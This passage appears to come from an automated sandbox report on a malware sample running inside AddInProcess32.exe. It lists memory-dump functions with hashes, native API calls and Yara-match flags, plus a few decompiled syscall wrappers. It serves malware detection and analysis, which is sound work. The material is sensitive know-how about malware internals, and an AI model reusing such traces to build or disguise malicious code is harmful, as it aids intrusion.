                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.421973911.0000000000FFD000.00000040.00000001.sdmp, Offset: 00FFD000, based on PE: false
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d4163faa04f1389f2664470f51a62f057b687c12d3749052a352086a5855c9f5
                                                                              • Instruction ID: d33749be1f0a8c21e53d39f66649ba4c3376130ecf65f087229d21efe56a4a5a
                                                                              • Opcode Fuzzy Hash: d4163faa04f1389f2664470f51a62f057b687c12d3749052a352086a5855c9f5
                                                                              • Instruction Fuzzy Hash: 8EF06271804244AEEB108E16DCC4B76FB98EF41734F18C55AEE185B296C3799C48DAB1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 054626D8, Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 527767272b81f7235c721af92f82ce41eed5fc9a17b4b0cca8a8b425a45eb9da
                                                                              • Instruction ID: 4f4e05ae6eb1e23d0ee613a2bc6d7dddecb228e576dac8ef5e6096a800b42d12
                                                                              • Opcode Fuzzy Hash: 527767272b81f7235c721af92f82ce41eed5fc9a17b4b0cca8a8b425a45eb9da
                                                                              • Instruction Fuzzy Hash: 94E11B74E041199FDB14DFA9C980AEEFBB2FF88305F24816AD804AB355D7749941CF62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 05462260, Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fbafa2436ac62981a522f1f24408957d6eb077e9c14ab31ab07e9e42e19e893e
                                                                              • Instruction ID: 770727f8a81ac01f691957d5be32ca89720f5eef117d17ea6a80230f4b89fe3a
                                                                              • Opcode Fuzzy Hash: fbafa2436ac62981a522f1f24408957d6eb077e9c14ab31ab07e9e42e19e893e
                                                                              • Instruction Fuzzy Hash: AAE11874E041199FDB14DFA9C980AEEFBB2FF89304F24816AD814AB355D734A941CF62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 05463A28, Relevance: .3, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9ca9822400b937950536c8dc8818fb080e63d2d829525098a8b676ea28e7188a
                                                                              • Instruction ID: c97618314ec00769494b42fb78c932bf98cbbed4df1a7bbb36b679133192b009
                                                                              • Opcode Fuzzy Hash: 9ca9822400b937950536c8dc8818fb080e63d2d829525098a8b676ea28e7188a
                                                                              • Instruction Fuzzy Hash: 0DE13A74E041598FDB14DFA9C980AEEFBB2FF88304F24856AD815A7356D730A941CF62
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 054548A2, Relevance: .2, Instructions: 242COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 13224de390cdb79392285cbed2f7b2ecd7143aad219bc0ce9e0a6255fa87b296
                                                                              • Instruction ID: 769819ef303fece1f6ee1f5696fa97de746f551b1571e1e0e2cd2c3765da57d4
                                                                              • Opcode Fuzzy Hash: 13224de390cdb79392285cbed2f7b2ecd7143aad219bc0ce9e0a6255fa87b296
                                                                              • Instruction Fuzzy Hash: 76A126A248E3C14FC7038B704C795927FB1AE23214B1E85EFD4C68E4A3E29D558AD723
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 054563AB, Relevance: .2, Instructions: 206COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.429884886.0000000005450000.00000004.00000001.sdmp, Offset: 05450000, based on PE: true
                                                                              • Associated: 00000001.00000002.429922225.0000000005460000.00000040.00000001.sdmp Download File
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4ff47b436a99ed943fb1ba9c3a5884e5c19558393a15acb5c1588573770f4f6f
                                                                              • Instruction ID: 5a6328ff3212f98612912ebcd6c7d7211ab1c189c01e04ec8fbcb008398606ac
                                                                              • Opcode Fuzzy Hash: 4ff47b436a99ed943fb1ba9c3a5884e5c19558393a15acb5c1588573770f4f6f
                                                                              • Instruction Fuzzy Hash: 6F816C7298D3C14BDB068F3448AA6C2BFB0AE1322435E86EFCCD54E557D21E504BDB66
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Analysis Process: AddInProcess32.exe PID: 6264 Parent PID: 4588 AddInProcess32.exeCOMMON

                                                                              Executed Functions

                                                                              Function 00419E0B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID: BMA$BMA
                                                                              • API String ID: 2738559852-2163208940
                                                                              • Opcode ID: c7544984bce2b1c87228a47735bc187059da444aa0750dbd48748f4aae0cb5ec
                                                                              • Instruction ID: 4fe5b75dff92a1ce98cba4ca99c9955512d9511116462172522007c39aeb3aaa
                                                                              • Opcode Fuzzy Hash: c7544984bce2b1c87228a47735bc187059da444aa0750dbd48748f4aae0cb5ec
                                                                              • Instruction Fuzzy Hash: 94F0F4B2200108AFCB04CF99DC80EEB77ADEF8C354F158249BE0DE7251C630E8518BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419E10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E00419E10(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A960(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                                              0x00419e13
                                                                              0x00419e1f
                                                                              0x00419e27
                                                                              0x00419e32
                                                                              0x00419e4d
                                                                              0x00419e55
                                                                              0x00419e59

                                                                              APIs
                                                                              • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E55
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID: BMA$BMA
                                                                              • API String ID: 2738559852-2163208940
                                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                              • Instruction ID: bd248b349f18b2ced93d1e709abaf342431bbeaaaaa26160fd0c904447d41470
                                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                              • Instruction Fuzzy Hash: 45F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158649BE1DA7241D630E851CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419D5D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00419D5D(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, signed char _a21, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;

				_a21 = _a21 >> 0x55;
				_t17 = _a4;
				_t5 = _t17 + 0xc40; // 0xc40
				E0041A960(_t33, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t23 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}





                                                                              0x00419d5d
                                                                              0x00419d63
                                                                              0x00419d6f
                                                                              0x00419d77
                                                                              0x00419dad
                                                                              0x00419db1

                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID: U
                                                                              • API String ID: 823142352-3372436214
                                                                              • Opcode ID: b48e8af83ab1fa7129cf3a856df758814241a1d67651ffac608d92b04c3818d4
                                                                              • Instruction ID: 0ecc1f259e353f1aedd2b6da1ffd1d6813b637172127a466756acdc956f94e33
                                                                              • Opcode Fuzzy Hash: b48e8af83ab1fa7129cf3a856df758814241a1d67651ffac608d92b04c3818d4
                                                                              • Instruction Fuzzy Hash: FE01B2B2215208ABCB08CF88DC95EEB37E9AF8C754F158248FA1D97241C630E851CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load
                                                                              • String ID:
                                                                              • API String ID: 2234796835-0
                                                                              • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                              • Instruction ID: b21dceb9c17b581325113e7f9749888d8b8163c3e846858d6705abbd9991eecb
                                                                              • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                                                              • Instruction Fuzzy Hash: A8015EB5D4020DBBDF10DBA5DC82FDEB3789F54308F0041AAE909A7281F635EB548B96
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419D60, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                              • Instruction ID: 5d405ca8330a7760d33d8cb8f94c0e61ce0ec213ce21d6c827413d184fac496c
                                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                              • Instruction Fuzzy Hash: F1F0B2B2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                              • Instruction ID: 9c08e1581e5817f7e91e4b21b7a397560e598f802d56d9274a49c90b7c070efe
                                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                              • Instruction Fuzzy Hash: 1EF015B2210208ABCB14DF89CC81EEB77ADEF88754F158549BE08A7241C630F810CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419F3A, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: 682d6b885e45ad76fd35cb9bb74e427a11a0dbe06507175c4967a2f38414feb7
                                                                              • Instruction ID: c4c91673f55cdf50b03d191e349a7edbbfd871b75a73db9cce2fdc9c7bb0b878
                                                                              • Opcode Fuzzy Hash: 682d6b885e45ad76fd35cb9bb74e427a11a0dbe06507175c4967a2f38414feb7
                                                                              • Instruction Fuzzy Hash: A4F01CB1210209AFCB14DF99CC81EE7B7ADEF88754F158549FE5C97241C630E921CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419E8A, Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: b898b10ed37f73ee457b4ee55b743b243c52ee174a8fa96423fcc5a3cae97736
                                                                              • Instruction ID: 58703a99195d55ca86410b247c4f7bed8e39fca0326c1b5473da2249cf414dbc
                                                                              • Opcode Fuzzy Hash: b898b10ed37f73ee457b4ee55b743b243c52ee174a8fa96423fcc5a3cae97736
                                                                              • Instruction Fuzzy Hash: 02E086751002187BD724DB94CC85EE77B5CEF48B60F15445ABA1C9BA41D530F94086D0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00419E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                              • Instruction ID: e68336ecf97fcbff1cce52d5eab911d0c0d253976a6ab71543f56f2ca0e2158f
                                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                              • Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: ee9a4c8e800ea36e03e149811a48c53a4a3bf505b2ac890a824db984049f8114
                                                                              • Instruction ID: 1c387b76600627650b6819d79891315938da2532beacdf6eba0751ca60b83255
                                                                              • Opcode Fuzzy Hash: ee9a4c8e800ea36e03e149811a48c53a4a3bf505b2ac890a824db984049f8114
                                                                              • Instruction Fuzzy Hash: 189002B124500406D1507199C404B465005A7D4341F51C021E5054558EC6998DD576A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: d7bba8a41a2951d5e7b908b0053666c053be85ae68e27558002299bdd512fc3d
                                                                              • Instruction ID: 066afbbaee80f1cf2a7b946c4befa58c81678e0e9740d18e04cc144136699620
                                                                              • Opcode Fuzzy Hash: d7bba8a41a2951d5e7b908b0053666c053be85ae68e27558002299bdd512fc3d
                                                                              • Instruction Fuzzy Hash: 629002A138500446D1107199C414F065005E7E5341F51C025E1054558DC659CC527166
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 42d680c767fc807cfd26ee6d7e5da497fb3ec73bb266bf45d793f20936cff6ba
                                                                              • Instruction ID: 2bd5919e88714193f29911616f0508cfeda5cdc7f670760f41842329c17a0e4f
                                                                              • Opcode Fuzzy Hash: 42d680c767fc807cfd26ee6d7e5da497fb3ec73bb266bf45d793f20936cff6ba
                                                                              • Instruction Fuzzy Hash: 2F90027124500417D1217199C504B075009A7D4281F91C422E041455CDD6968952B161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 3e208460d600e2e51451afc7bd2a4eea1a5e3a9b9cc9f6b0c47125f37460411b
                                                                              • Instruction ID: 508186fb2cfded73a4f089206a1b60fad9520664b0f2a3da021fb72835730888
                                                                              • Opcode Fuzzy Hash: 3e208460d600e2e51451afc7bd2a4eea1a5e3a9b9cc9f6b0c47125f37460411b
                                                                              • Instruction Fuzzy Hash: 7C900261286041565555B199C4049079006B7E4281791C022E1404954CC5669856F661
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017798F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 1edce07bd4535f6fae5074ae367ba8f0e268897b566ee16ce27f14205d341701
                                                                              • Instruction ID: a39710d3f77afb66d058e72b7e279df777655238508491215038944a314520d9
                                                                              • Opcode Fuzzy Hash: 1edce07bd4535f6fae5074ae367ba8f0e268897b566ee16ce27f14205d341701
                                                                              • Instruction Fuzzy Hash: 2890026164500506D1117199C404A16500AA7D4281F91C032E1014559ECA658992B171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 679d60f56721b449bf2696366a336b90a0d294d5817eb7c55fc56312ad8ed973
                                                                              • Instruction ID: dad9c040ba12159cd864e08e64d24f74c49e13ae3687ead8c07960c545250216
                                                                              • Opcode Fuzzy Hash: 679d60f56721b449bf2696366a336b90a0d294d5817eb7c55fc56312ad8ed973
                                                                              • Instruction Fuzzy Hash: 8590026125580046D21075A9CC14F075005A7D4343F51C125E0144558CC95588617561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: d9b73d454782cf347562b7b854f2009a9251738b1ad830d4f7c470d478c4eab0
                                                                              • Instruction ID: 8d3223bf904b67048c4cfa1214fe2532237efd25386b507f13105443f47b1234
                                                                              • Opcode Fuzzy Hash: d9b73d454782cf347562b7b854f2009a9251738b1ad830d4f7c470d478c4eab0
                                                                              • Instruction Fuzzy Hash: E790026164500046415071A9C844D069005BBE5251751C131E0988554DC599886576A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 4b0eb5f9f84ecbf878179d32d5a601a2703111a53a48fcd12da478b1c0d02d81
                                                                              • Instruction ID: 55859acc61968ad77d4a2c93a8a82a82b72851bca6ec76ea3b2ca8c055457d3f
                                                                              • Opcode Fuzzy Hash: 4b0eb5f9f84ecbf878179d32d5a601a2703111a53a48fcd12da478b1c0d02d81
                                                                              • Instruction Fuzzy Hash: 4790027124540406D1107199C814B0B5005A7D4342F51C021E1154559DC665885175B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5f6e3829215884b26eded7e1d37023745882a3cb8ba8939b8f321e4e3909d044
                                                                              • Instruction ID: 9966db121b8c030af6e55580ff80fe879c88bedfab1e472fb111a3138541315a
                                                                              • Opcode Fuzzy Hash: 5f6e3829215884b26eded7e1d37023745882a3cb8ba8939b8f321e4e3909d044
                                                                              • Instruction Fuzzy Hash: D7900265255000070115B59987049075046A7D9391351C031F1005554CD66188617161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 39e218ee8adb945aaad8860bc5957cd0e211f0b405239865dce7ea444ab31779
                                                                              • Instruction ID: a49e9a3960065345fe8eebc9d0bcc5a5b5d6dcef72872ca5e1127532284be3d9
                                                                              • Opcode Fuzzy Hash: 39e218ee8adb945aaad8860bc5957cd0e211f0b405239865dce7ea444ab31779
                                                                              • Instruction Fuzzy Hash: F39002A12460000741157199C414A16900AA7E4241B51C031E1004594DC56588917165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: fa73e2d2ce019f7a6fdbc6ac7a2f7237b3476536ac1b92a333dff3700320a3d1
                                                                              • Instruction ID: 3210e63192e8992dd1d9479d9318080ee6c4f7c6eb89c431d15d69dc8fdca38c
                                                                              • Opcode Fuzzy Hash: fa73e2d2ce019f7a6fdbc6ac7a2f7237b3476536ac1b92a333dff3700320a3d1
                                                                              • Instruction Fuzzy Hash: 1B90027124500406D11075D9D408A465005A7E4341F51D021E5014559EC6A588917171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017797A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 87e071bb4d77af58e428bc1f1c8fd6e248852eb7e2c857fd3635bf2e355ac133
                                                                              • Instruction ID: 1d739e7e298b658a640c93891525d04a303ed4e11e5cf1b761082110ba3ec658
                                                                              • Opcode Fuzzy Hash: 87e071bb4d77af58e428bc1f1c8fd6e248852eb7e2c857fd3635bf2e355ac133
                                                                              • Instruction Fuzzy Hash: 6990026134500007D1507199D418A069005F7E5341F51D021E0404558CD95588567262
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 721bd8ae68c7130f082d1834ad274aa84b3dc38face2f4baf10836297ff48987
                                                                              • Instruction ID: d651c38ec4f6cb1c583086468c07a05bd5d8e36020711aa54685a06f9797c3a6
                                                                              • Opcode Fuzzy Hash: 721bd8ae68c7130f082d1834ad274aa84b3dc38face2f4baf10836297ff48987
                                                                              • Instruction Fuzzy Hash: 9790026925700006D1907199D408A0A5005A7D5242F91D425E000555CCC95588697361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01779660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
